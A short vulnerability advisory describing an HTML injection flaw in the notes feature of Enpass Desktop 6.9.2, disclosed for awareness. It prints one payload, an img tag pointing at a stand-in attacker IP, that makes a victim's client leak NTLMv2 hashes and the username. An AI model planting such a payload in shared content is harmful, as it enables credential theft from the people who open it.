Enpass Desktop Application 6.9.2 HTML Injection

====================================================================HTML Injection in Enpass Desktop Application (Version 6.9.2)Product:            Enpass Password ManagerVersion:            6.9.2Issue date:        2024-02-11Download:         https://www.enpass.io/beta/Discovered by Muhammad Danial====================================================================*Overview:*A vulnerability has been discovered in the Enpass Desktop applicationversion 6.9.2 for Linux and Windows, which could potentially lead to HTMLinjection attacks. This vulnerability may be exploited by an attacker toexecute malicious code and leak NTLMv2 hashes, compromising the securityand privacy of affected users.*Vulnerability Details:*The vulnerability exists in the handling of notes within the Enpass Desktopapplication. By crafting a malicious note containing a specially craftedpayload such as <img src="http://attacker_ip/?c=" />, an attacker caninject arbitrary HTML code into the note. When the victim opens themalicious note shared by the attacker, the HTML injection payload isexecuted, allowing the attacker to capture the victim's NTLMv2 hashes andusername through their Enpass Desktop application.*Impact:*Successful exploitation of this vulnerability could result in the leakageof usernames and NTLMv2 hashes.